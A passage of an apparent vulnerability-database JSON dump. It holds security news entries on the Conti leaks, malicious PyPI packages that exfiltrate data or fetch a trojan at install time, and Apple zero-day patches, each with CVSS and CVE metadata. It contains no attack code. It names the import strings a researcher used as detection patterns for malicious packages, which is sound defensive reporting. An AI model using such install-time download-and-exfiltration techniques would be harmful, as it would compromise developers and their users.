And that\u2019s what you\u2019re telling us: They\u2019re still going to be active and they\u2019re going to retool anyway. Right. And will resurface.\n\n**Vinny Troia:** Yeah. I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven\u2019t even made it to the set about how the ransomware groups were being investigated.\n\n**Vinny Troia:** And someone high up in the group basically told them they didn\u2019t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It\u2019s almost like they had insider information, or maybe they literally were working for [Russia].\n\n**Lisa Vaas:** I think REvil, that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia\u2019s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn\u2019t I read Brian Krebs earlier today? I have to do that. That\u2019s like a requirement of the job. OK, well, Vinny, unless you\u2019ve got anything else to add, I\u2019m going to let you go.\n\n**Vinny Troia:** No, all good.\n\n**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.\n\n030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T16:31:36", "type": "threatpost", "title": "Russia Leaks Data From a Thousand Cuts\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T16:31:36", "id": "THREATPOST:6C547AAC30142F12565AB289E211C079", "href": "https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T18:09:26", "description": "Three malicious packages hosted in the Python Package Index (PyPI) code repository have been uncovered, which collectively have more than 12,000 downloads \u2013 and presumably slithered into installations in various applications.\n\nIndependent researcher Andrew Scott found the packages during a nearly sitewide analysis of the code contained in PyPI, which is a repository of software code created in the Python programming language. 
Like GitHub, npm and RubyGems, PyPI allows coders to upload software packages for use by developers in building various applications, services and other projects.\n\nUnfortunately, a single malicious package can be baked into multiple different projects \u2013 infecting them with cryptominers, info-stealers and more, and making remediation a complex process.\n\nIn this case, Scott found a malicious package containing a known trojan malware and two info-stealers.\n\nThe trojanized package is called \u201caws-login0tool,\u201d and once the package is installed, it fetches a payload executable that turns out to be a [known trojan](<https://www.virustotal.com/gui/file/79d9ecfcc143ae3216904c882a3984a90901536e6fccd223eb9bf78d943df1cd>), he said.\n\n\u201cI found this package because it was flagged in multiple text searches I did looking at setup.py, since that\u2019s one of the most common locations for malicious code in Python packages since arbitrary code can be executed there at install time,\u201d Scott explained in a [Sunday posting](<https://medium.com/ochrona/3-new-malicious-packages-found-on-pypi-a6bbb14b5e2>). \u201cSpecifically I found this by looking for import urllib.request since this is commonly used to exfiltrate data or download malicious files and it was also triggered by `from subprocess import Popen` which is somewhat suspicious because most packages don\u2019t need to execute arbitrary command line code.\u201d\n\nScott also identified two other malicious packages by looking at the import urllib.request string, both of which are built for data exfiltration.\n\nNamed \u201cdpp-client\u201d and \u201cdpp-client1234I,\u201d the two were uploaded by the same user in February. During installation, they collect details on the environment and file listings, and appear to \u201cbe looking specifically for files related to Apache Mesos,\u201d Scott said, which is an open-source project to manage computer clusters. 
Once the information is gathered, it\u2019s sent off to an unknown web service, according to the researcher.\n\nThe Python security team removed the identified packages once notified on Dec. 10, but all three packages live on thanks to the projects that imported them prior to the removal.\n\nScott said that the trojan package was first added to PyPI on Dec. 1. It was subsequently downloaded nearly 600 times. As for the data stealers, the dpp-client package has been downloaded more than 10,000 times, including 600+ downloads in the last month; dpp-client1234 has been downloaded around 1,500 times, and both packages mimicked an existing popular library with their source code URL, \u201cso anyone browsing to the package in PyPI or analyzing how popular the library was would see a large number of GitHub stars and forks \u2013 indicating a good reputation.\u201d\n\nThe software supply chain has become an increasingly popular method of distributing malware. Last week, for instance, a series of malicious packages in the Node.js package manager (npm) code repository that looked to harvest Discord tokens [was found.](<https://threatpost.com/malicious-npm-code-packages-discord/176886/>) The packages can be used to take over unsuspecting users\u2019 accounts and servers.\n\n**_There\u2019s a sea of unstructured data on the internet relating to the latest security threats. _****_[REGISTER TODAY](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_****_ to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). 
This [LIVE, interactive Threatpost Town Hall](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>), sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken._**\n\n[**_Register NOW_**](<https://threatpost.com/webinars/security-threats-natural-language-processing/?utm_source=In+Article&utm_medium=article&utm_campaign=Decoding+the+Data+Ocean:+Security+Threats+%26+Natural+Language+Processing&utm_id=In+Article>)_** for the LIVE event!**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T18:46:34", "type": "threatpost", "title": "Malicious PyPI Code Packages Rack Up Thousands of Downloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T18:46:34", "id": "THREATPOST:38E8D69F26ADB15A989532924B2A98C4", "href": 
"https://threatpost.com/malicious-pypi-code-packages/176971/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "malwarebytes": [{"lastseen": "2022-01-27T23:27:10", "description": "Apple has released patches for iOS 15.3, iPadOS 15.3, and macOS Monterey 12.2 and is urging users to update. The most significant reasons are two actively exploited zero-day vulnerabilities, one of which has a publicly disclosed Proof-of-Concept (PoC).\n\nUsing this vulnerability, designated [CVE-2022-22587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22587>), a malicious app could execute random code with kernel privileges.\n\n## Why did it take so long\n\nThe zero-day appears to have been found and reported by at least two researchers independently of each other. Apple acknowledged an anonymous researcher, Meysam Firouzi (@R00tkitSMM) of MBition \u2013 Mercedes-Benz Innovation Lab, and Siddharth Aeri (@b1n4r1b01) for having reported this flaw.\n\nThe two researchers both stated that it took a long time for this bug to be acknowledged and fixed. One of them posted a Proof-of-Concept (PoC) on January 1st.\n\n> while my californian friends are still waiting for 2022 how about a kernel oob read that works on the latest iOS 15.2  <https://t.co/qo0WLLsQIV> <https://t.co/HZA0y5Sghi>\n> \n> -- binaryboy (@b1n4r1b01) [January 1, 2022](<https://twitter.com/b1n4r1b01/status/1477172028524355585?ref_src=twsrc%5Etfw>)\n\nThe other researcher reported the issue through the Zero-Day-Initiative (ZDI) three months ago, waited for two months and then decided to report to Apple directly.\n\n> I reported this vulnerability to [@thezdi](<https://twitter.com/thezdi?ref_src=twsrc%5Etfw>) about 3 months ago and unfortunately they didn\u2019t answer me for like 2 months, then i canceled my report and sent it to apple directly. And we see it had been exploited in the wild. 
<https://t.co/RjnjiY4esr>\n> \n> -- Meysam Firouzi (@R00tkitSMM) [January 26, 2022](<https://twitter.com/R00tkitSMM/status/1486477431431065601?ref_src=twsrc%5Etfw>)\n\nThe Zero Day Initiative (ZDI) was created to encourage the reporting of zero-day vulnerabilities privately to the affected vendors by financially rewarding researchers, although there have been some complaints from researchers that they didn't feel they were taken seriously by the ZDI.\n\n## IOMobileFrameBuffer\n\nCVE-2022-22587 is a memory corruption bug in the IOMobileFrameBuffer that affects iOS, iPadOS, and macOS Monterey. IOMobileFrameBuffer is a kernel extension for managing the screen FrameBuffer. An earlier vulnerability in this extension, listed as [CVE-2021-30807](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30807>), was tied to the [Pegasus spyware](<https://blog.malwarebytes.com/privacy-2/2021/07/pegasus-spyware-has-been-here-for-years-we-must-stop-ignoring-it/>). Another one was listed as [CVE-2021-30883](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-30883>) and also allowed an application to execute arbitrary code with kernel privileges. We hope that the input validation has now been curated to make this impossible in the future.\n\n## Actively exploited\n\nApple [acknowledged](<https://support.apple.com/en-us/HT213053>) that it was aware of a report that this issue may have been actively exploited.\n\n## Safari WebKit bug\n\nThe second zero-day is the Safari WebKit bug in iOS and iPadOS that [allowed websites to track your browsing activity and users' identities](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/browsers-on-ios-ipados-and-mac-leak-your-browsing-activity-and-personal-identifiers/>) in real-time. 
After a researcher of FingerprintJS disclosed the bug in November, it was assigned the [CVE-2022-22594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22594>) and has been fixed.\n\n## Updates\n\niOS 15.3 and iPadOS 15.3 fix a total of ten security bugs. The updates are available for iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n\nmacOS Monterey 12.2 patches a total of 13 vulnerabilities. It also promises to bring smoother scrolling to MacBooks, fixing a previously reported scrolling issue in Safari.\n\nApple also released security fixes for legacy versions of macOS Big Sur and Catalina.\n\nStay safe, everyone!\n\nThe post [Update now! Apple patches another actively used zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/update-now-apple-patches-another-actively-used-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-27T21:56:12", "type": "malwarebytes", "title": "Update now! 
Apple patches another actively used zero-day", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30807", "CVE-2021-30883", "CVE-2022-22587", "CVE-2022-22594"], "modified": "2022-01-27T21:56:12", "id": "MALWAREBYTES:C265FF6D1D82CDE3FB6E6C1E4248A791", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/01/update-now-apple-patches-another-actively-used-zero-day/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-09-21T00:04:01", "description": "On Monday, Apple released a long list of patched vulnerabilities to its software, including a new zero-day flaw affecting Macs and iPhones. The company revealed it's aware that threat actors may have been actively exploiting this vulnerability, which is tracked as **[CVE-2022-32917](<https://cve.report/CVE-2022-32917>)**.\n\nAs it's a zero-day, nothing much is said about CVE-2022-32917, only that it may allow malformed applications to execute potentially malicious code with kernel privileges. Apple says it's patched this flaw with improved bounds checks. 
Below is a list of products this bug affects:\n\n * Macs running [macOS Monterey 12.6](<https://support.apple.com/en-us/HT213444>) and [macOS Big Sur 11.7](<https://support.apple.com/en-us/HT213443>)\n * iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation)\n\nCVE-2022-32917 is the eighth zero-day flaw that Apple has addressed since the beginning of 2022. The first seven are as follows:\n\n * [CVE-2022-32894](<https://cve.report/CVE-2022-32894>), a flaw in the iOS Kernel, was patched in August\n * [CVE-2022-32893](<https://cve.report/CVE-2022-32893>), a flaw in WebKit, was patched in August\n * [CVE-2022-22674](<https://cve.report/CVE-2022-22674>), an Intel Graphics Driver bug, was patched in March\n * [CVE-2022-22675](<https://cve.report/CVE-2022-22675>), a bug in AppleACD, was patched in March\n * [CVE-2022-22620](<https://cve.report/CVE-2022-22620>), a WebKit bug affecting iPhones, Macs, and iPads, was patched in February\n * [CVE-2022-22587](<https://cve.report/CVE-2022-22587>), a privileged code execution flaw, was patched in January\n * [CVE-2022-22594](<https://cve.report/CVE-2022-22594>), a web browser activity tracking flaw, was patched in January\n\n## Mitigation\n\nSince we received a lot of questions about what actions are needed, we're adding this section for your convenience.\n\nThe necessary updates for these vulnerabilities were included in:\n\n * the [September 12 update for macOS Big Sur 11.7](<https://support.apple.com/en-us/HT213443>).\n * the [September 12 update for macOS Monterey 12.6](<https://support.apple.com/en-us/HT213444>).\n * the [September 12 update for iOS 15.7 and iPadOS 15.7](<https://support.apple.com/en-us/HT213445>). \n\nThese should all have reached you in your regular update routines, but it doesn't hurt to check if your device is at the [latest update level](<https://support.apple.com/en-us/HT201222>). 
\n\n[How to update your iPhone or iPad.](<https://support.apple.com/en-us/HT204204>)\n\n[How to update macOS on Mac](<https://support.apple.com/en-us/HT201541>).\n\nIf you fear your Mac has been infected, try out [Malwarebytes for Mac](<https://malwarebytes.com/mac>). Or [Malwarebytes for iOS](<https://support.malwarebytes.com/hc/en-us/categories/360002468273-Malwarebytes-for-iOS>) for your Apple devices.\n\nAs this latest vulnerability is already being exploited, it's really important that you update your devices as soon as you can. Stay safe!", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-09-13T14:00:00", "type": "malwarebytes", "title": "[updated] Important update! 
iPhones, Macs, and more vulnerable to zero-day bug", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587", "CVE-2022-22594", "CVE-2022-22620", "CVE-2022-22674", "CVE-2022-22675", "CVE-2022-32893", "CVE-2022-32894", "CVE-2022-32917"], "modified": "2022-09-13T14:00:00", "id": "MALWAREBYTES:E9F8D9962C90DF0556F1F4180FFAA7D7", "href": "https://www.malwarebytes.com/blog/news/2022/09/update-now-apple-devices-are-exposed-to-a-new-zero-day-flaw", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T22:07:44", "description": "There are many reasons why we want a bug fixed as soon as we can, but there are also plenty of reasons why doing it \u201cright now\u201d is not an option. This phenomenon starts at the side of the developers. The average time to fix a bug seems to vary depending on the platform the bug was found in. What is one group doing better and can the others take lessons from that? Or is it something we have to take as it comes?\n\n"Bug-fixing time" refers to the time required to fix known bugs. So, on a per bug basis it is the time between being made aware of an existing bug and issuing a fix for the bug. 
The ability to better understand and predict bug-fixing time can help a project team better estimate software maintenance efforts and better manage software projects.\n\n## Reasons to fix ASAP\n\nThere are some very obvious reasons why we want to push and install bug fixes as soon as possible.\n\n * Improved security by fixing the vulnerability.\n * Even if a vulnerability is found by a researcher taking the high road of responsible disclosure, once the cat is out of the bag, there is a good chance others will be able to duplicate the researcher's effort. This could result in a zero-day vulnerability.\n * When you are working on a new version, a critical bug in the old version is holding you back as long as you don\u2019t know how to fix it.\n * If the published timeline shows it has taken months to fix a bug, it reflects badly on your company, and could lead customers to question whether you care about security.\n\nIn general, you can say that the bug-fixing time is an important factor for bug-related analysis, such as measuring software quality. Having your software considered to be \u201cbuggy\u201d does not help sales in any way. But situations may arise when you need to prioritize what needs to be fixed first.\n\n## Differences in platform\n\nLast month, the Project Zero team at Google looked at fixed bugs that were reported between January 2019 and December 2021. 
During this period, Project Zero reported 376 issues to vendors under their standard 90-day deadline.\n\nWhen [reading the data](<https://googleprojectzero.blogspot.com/2022/02/a-walk-through-project-zero-metrics.html>), it is important to note that the number of issues is too small and not chosen randomly enough to give a full picture, but it gives you an idea at least.\n\nVendor| Total bugs| Fixed by day 90| Fixed during grace period| Exceeded deadline and grace period| Avg days to fix \n---|---|---|---|---|--- \nApple| 84| 73 (87%)| 7 (8%)| 4 (5%)| 69 \nMicrosoft| 80| 61 (76%)| 15 (19%)| 4 (5%)| 83 \nGoogle| 56| 53 (95%)| 2 (4%)| 1 (2%)| 44 \nLinux| 25| 24 (96%)| 0 (0%)| 1 (4%)| 25 \nAdobe| 19| 15 (79%)| 4 (21%)| 0 (0%)| 65 \nMozilla| 10| 9 (90%)| 1 (10%)| 0 (0%)| 46 \nSamsung| 10| 8 (80%)| 2 (20%)| 0 (0%)| 72 \n \nOverall, the data show that almost all of the big vendors here are coming in under 90 days, on average.\n\n## Complaints from bug bounty hunters\n\nAt this point it should be pointed out that bugs reported by the Project Zero team are reported to vendors directly and will be taken very seriously by the vendors.\n\nIndividual bounty hunters, however, have been complaining about getting their bugs accepted. For example, in January we saw [CVE-2022-22587](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22587>), a vulnerability in Apple\u2019s IOMobileFrameBuffer, where a malicious app could execute random code with kernel privileges. This vulnerability ended up being a zero-day vulnerability that was exploited in the wild after one of them posted a Proof-of-Concept (PoC).\n\nMany researchers that don\u2019t want to report to vendors directly make use of the Zero-Day-Initiative (ZDI). 
The ZDI was created to encourage the reporting of zero-day vulnerabilities privately to the affected vendors by financially rewarding researchers, although there have been complaints from researchers that they didn\u2019t feel they were taken seriously by the ZDI.\n\n## The next step\n\nSo, yes, it's important to fix vulnerabilities ASAP, but why does it take so long sometimes before these fixes and patches get installed?\n\nAccording to recent podcast guest Jess Dodson, the problem of patching isn\u2019t just a problem of resources\u2014time, staffing, funding\u2014but also of mindset. For some organizations, refusing to patch almost brings with it a bizarre sense of pride, Dodson said.\n\nFinally, even if you are not a Federal Civilian Executive Branch (FCEB) agency that needs to follow the [Binding Operational Directive 22-01](<https://www.cisa.gov/binding-operational-directive-22-01>), the CISA list known as the [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) can act as a good guideline for your patch management strategy. 
This catalog provides FCEB agencies with a list of vulnerabilities that are known to be exploited in the wild and gives the agencies a due date by when the vulnerability needs to be patched in their organization.\n\nThe post [The struggle to reduce bug-fixing time is real](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/the-struggle-to-reduce-bug-fixing-time-is-real/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-03-07T20:06:37", "type": "malwarebytes", "title": "The struggle to reduce bug-fixing time is real", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22587"], "modified": "2022-03-07T20:06:37", "id": "MALWAREBYTES:0CEEA2EDED4A06AE416CB7875CCE1C94", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/03/the-struggle-to-reduce-bug-fixing-time-is-real/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-02-11T14:18:19", "description": "Apple has released a security fix for a zero-day vulnerability ([CVE-2022-22620](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22620>)) that it says "may have been actively exploited." According to the security update information provided by [Apple](<https://support.apple.com/en-us/HT213092>) the vulnerability exists in WebKit\u2014the HTML rendering engine component of its Safari browser\u2014and can be used by an attacker to create web content that may lead to arbitrary code execution.\n\nApple says it has addressed this vulnerability with improved memory management in iOS 15.3.1, iPadOS 15.3.1, macOS Monterey 12.2.1, and Safari 15.3.\n\n### Vulnerability\n\nThe vulnerability is a use-after-free (UAF) issue in WebKit that could lead to OS crashes and code execution on compromised devices. Use after free (UAF) is a type of vulnerability that results from the incorrect use of dynamic memory during a program\u2019s operation. 
If, after freeing a memory location, a program does not clear the pointer to that memory, an attacker can use the error to manipulate the program. Referencing memory after it has been freed can cause a program to crash, use unexpected values, or execute code.\n\nThis issue can be exploited when WebKit processes HTML content. The attacker can exploit this vulnerability by luring users to visit a specially crafted web page. Once the user opens the malicious web page, an attacker can remotely execute malicious code on the targeted system. The vulnerability has been reported publicly as being exploited in the wild and was reported by an anonymous researcher.\n\nWebKit is the browser engine that powers Safari on Macs as well as all browsers on iOS and iPadOS (browsers on iOS and iPadOS are obliged to use it). It is also the web browser engine used by Mail, App Store, and many other apps on macOS, iOS, and Linux. \n\n### Affected devices\n\nUsers owning the following devices should install the update as soon as possible:\n\n * iOS 15.3.1 and iPadOS 15.3.1 can be found on iPhone 6s and later, iPad Pro (all models), iPad Air 2 and later, iPad 5th generation and later, iPad mini 4 and later, and iPod touch (7th generation).\n * macOS Monterey 12.2.1 for all systems running macOS Monterey (MacBooks, iMacs, Mac minis, and Mac Pros)\n * All devices running macOS Big Sur and macOS Catalina which are using Safari.\n\nStay safe, everyone!\n\nThe post [Update now! Apple fixes actively exploited zero-day](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2022-02-11T11:27:06", "type": "malwarebytes", "title": "Update now! 
Apple fixes actively exploited zero-day", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T11:27:06", "id": "MALWAREBYTES:180975C3E3516E431BF7664666327048", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2022/02/update-now-apple-fixes-actively-exploited-zero-day/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa_kev": [{"lastseen": "2023-11-27T15:38:46", "description": "Apple IOMobileFrameBuffer contains a memory corruption vulnerability which can allow a malicious application to execute arbitrary code with kernel privileges.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-28T00:00:00", "type": "cisa_kev", "title": "Apple Memory Corruption Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22587"], "modified": "2022-01-28T00:00:00", "id": "CISA-KEV-CVE-2022-22587", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-27T15:38:46", "description": "Apple Webkit, which impacts iOS, iPadOS, and 
macOS, contains a vulnerability that allows for remote code execution.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-02-11T00:00:00", "type": "cisa_kev", "title": "Apple Webkit Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2022-02-11T00:00:00", "id": "CISA-KEV-CVE-2022-22620", "href": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "attackerkb": [{"lastseen": "2023-10-18T16:36:45", "description": "A use after free issue was addressed with improved memory management. This issue is fixed in macOS Monterey 12.2.1, iOS 15.3.1 and iPadOS 15.3.1, Safari 15.3 (v. 16612.4.9.1.8 and 15612.4.9.1.8). Processing maliciously crafted web content may lead to arbitrary code execution. 
Apple is aware of a report that this issue may have been actively exploited..\n\n \n**Recent assessments:** \n \n**Obligado1** at May 03, 2022 7:06am UTC reported:\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-03-18T00:00:00", "type": "attackerkb", "title": "CVE-2022-22620", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22620"], "modified": "2023-10-07T00:00:00", "id": "AKB:12497ECD-6565-46DB-AD65-2F25827C7711", "href": "https://attackerkb.com/topics/82P5tenpQJ/cve-2022-22620", 